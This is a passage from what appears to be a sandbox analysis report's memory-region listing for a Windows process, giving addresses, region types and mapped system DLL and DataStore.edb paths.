0x7ff87b371fff monitored = 0 entry_point = 0x7ff87b352340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1036 start_va = 0x7ff87b5b0000 end_va = 0x7ff87b5bbfff monitored = 0 entry_point = 0x7ff87b5b2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1037 start_va = 0x7ff87b5c0000 end_va = 0x7ff87b5e3fff monitored = 0 entry_point = 0x7ff87b5c3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1038 start_va = 0x7ff87b760000 end_va = 0x7ff87b853fff monitored = 0 entry_point = 0x7ff87b76a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1039 start_va = 0x7ff87b8b0000 end_va = 0x7ff87b8f8fff monitored = 0 entry_point = 0x7ff87b8ba090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1040 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1041 start_va = 0x7ff87ba10000 end_va = 0x7ff87ba1cfff monitored = 0 entry_point = 0x7ff87ba11fe0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1042 start_va = 0x7ff87bab0000 end_va = 0x7ff87bae0fff monitored = 0 entry_point = 0x7ff87bab7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1043 start_va = 0x7ff87bb10000 end_va = 0x7ff87bb89fff monitored = 0 entry_point = 0x7ff87bb31a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1044 start_va = 0x7ff87bbd0000 end_va = 0x7ff87bc03fff monitored = 0 entry_point = 0x7ff87bbeae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1045 start_va = 0x7ff87bc10000 end_va = 0x7ff87bc19fff monitored = 0 entry_point = 0x7ff87bc11830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1046 start_va = 0x7ff87bd20000 end_va = 0x7ff87bd3efff monitored = 0 entry_point = 0x7ff87bd25d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1047 start_va = 0x7ff87be90000 end_va = 0x7ff87beebfff monitored = 0 entry_point = 0x7ff87bea6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1048 start_va = 0x7ff87bf40000 end_va = 0x7ff87bf56fff monitored = 0 entry_point = 0x7ff87bf479d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1049 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1050 start_va = 0x7ff87c0a0000 end_va = 0x7ff87c0c0fff monitored = 0 entry_point = 0x7ff87c0b0250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1051 start_va = 0x7ff87c0f0000 end_va = 0x7ff87c129fff monitored = 0 entry_point = 0x7ff87c0f8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1052 start_va = 0x7ff87c130000 end_va = 0x7ff87c156fff monitored = 0 entry_point = 0x7ff87c140aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1053 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1054 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1055 start_va = 0x7ff87c430000 end_va = 0x7ff87c448fff monitored = 0 entry_point = 0x7ff87c435e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1056 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1057 start_va = 0x7ff87c480000 end_va = 0x7ff87c518fff monitored = 0 entry_point = 0x7ff87c4af4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1058 start_va = 0x7ff87c5c0000 end_va = 0x7ff87c5cffff monitored = 0 entry_point = 0x7ff87c5c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1059 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1060 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1061 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1062 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1063 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1064 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1065 start_va = 0x7ff87cdb0000 end_va = 0x7ff87ce35fff monitored = 0 entry_point = 0x7ff87cdbd8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1066 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1067 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1068 start_va = 0x7ff87d0a0000 end_va = 0x7ff87d0b6fff monitored = 0 entry_point = 0x7ff87d0a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1069 start_va = 0x7ff87d170000 end_va = 0x7ff87d336fff monitored = 0 entry_point = 0x7ff87d1cdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1070 start_va = 0x7ff87d340000 end_va = 0x7ff87d394fff monitored = 0 entry_point = 0x7ff87d357970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1071 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1072 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1073 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1074 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1075 start_va = 0x7ff87efa0000 end_va = 0x7ff87efa7fff monitored = 0 entry_point = 0x7ff87efa1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1076 start_va = 0x7ff87efb0000 end_va = 0x7ff87f3d8fff monitored = 0 entry_point = 0x7ff87efd8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1077 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1078 start_va = 0x7ff87f570000 end_va = 0x7ff87f5cbfff monitored = 0 entry_point = 0x7ff87f58b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1079 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1080 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1081 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1082 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1083 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1084 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1085 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1086 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1087 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1088 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1090 start_va = 0x410000 end_va = 0x41ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1091 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 1092 start_va = 0x440000 end_va = 0x44ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1093 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1094 start_va = 0x450000 end_va = 0x45ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1095 start_va = 0x460000 end_va = 0x46ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1096 start_va = 0x8800000 end_va = 0x88fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1097 start_va = 0x8900000 end_va = 0x89fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008900000" filename = "" Region: id = 1099 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1100 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1101 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1102 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1508 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1509 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1631 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1633 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1755 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1757 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1758 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1880 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1882 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2007 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2008 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2129 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2131 start_va = 0x410000 end_va = 0x415fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2253 start_va = 0x8e00000 end_va = 0x8efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e00000" filename = "" Region: id = 2254 start_va = 0x8f00000 end_va = 0x8ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f00000" filename = "" Region: id = 2377 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2378 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2986 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2988 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3110 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3112 start_va = 0x9000000 end_va = 0x90fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009000000" filename = "" Region: id = 3113 start_va = 0x9100000 end_va = 0x91fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009100000" filename = "" Region: id = 3114 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3115 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3116 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3239 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3240 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3362 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3364 start_va = 0x400000 end_va = 0x420fff monitored = 0 entry_point = 0x402300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3365 start_va = 0x430000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3366 start_va = 0x400000 end_va = 0x420fff monitored = 0 entry_point = 0x402300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3367 start_va = 0x400000 end_va = 0x420fff monitored = 0 entry_point = 0x402300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3368 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3369 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3370 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3371 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3372 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3494 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3496 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3497 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3620 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3621 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3742 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3744 start_va = 0x9200000 end_va = 0x92fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009200000" filename = "" Region: id = 3745 start_va = 0x9300000 end_va = 0x93fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009300000" filename = "" Region: id = 3746 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3747 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3869 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3991 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3993 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4115 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4116 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4382 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4384 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4507 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4630 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4631 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4752 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4754 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4875 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4878 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4879 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5001 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5126 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5127 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5249 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5251 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5252 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5375 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5377 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5500 start_va = 0x9400000 end_va = 0x94fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009400000" filename = "" Region: id = 5501 start_va = 0x9500000 end_va = 0x95fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009500000" filename = "" Region: id = 5502 start_va = 0x9600000 end_va = 0x96fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009600000" filename = "" Region: id = 5624 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5626 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5749 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5751 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5752 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5876 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5878 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6001 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6002 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6124 start_va = 0x400000 end_va = 0x405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 